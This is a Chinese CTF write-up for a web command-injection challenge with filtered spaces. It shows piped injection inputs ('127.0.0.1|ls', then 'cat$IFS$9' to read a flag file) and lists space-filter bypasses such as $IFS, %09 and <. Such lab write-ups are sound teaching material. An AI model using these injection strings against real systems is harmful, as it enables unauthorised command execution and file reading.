点击此处获得更好的阅读体验
本WP来自wuerror原创投稿
题目考点
命令注入
过滤空格
解题思路
127.0.0.1|ls 找到flag文件
接下来要读文件内容免不了要 cat xxx 这就要绕过对空格的过滤
常见方法有< 、<>、%20(space)、%09(tab)、\$IFS\$9、 \${IFS}、$IFS等(百度以下挺多的)
经测试这里可以使用\$IFS\$9
1 | 127.0.0.1|cat\$IFS\$9flagxxx.php |
过滤空格
- 本文链接: https://writeup.ctfhub.com/Skill/Web/RCE/2Y9RVdcHtdEjPoz5bdWrBr.html
- 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!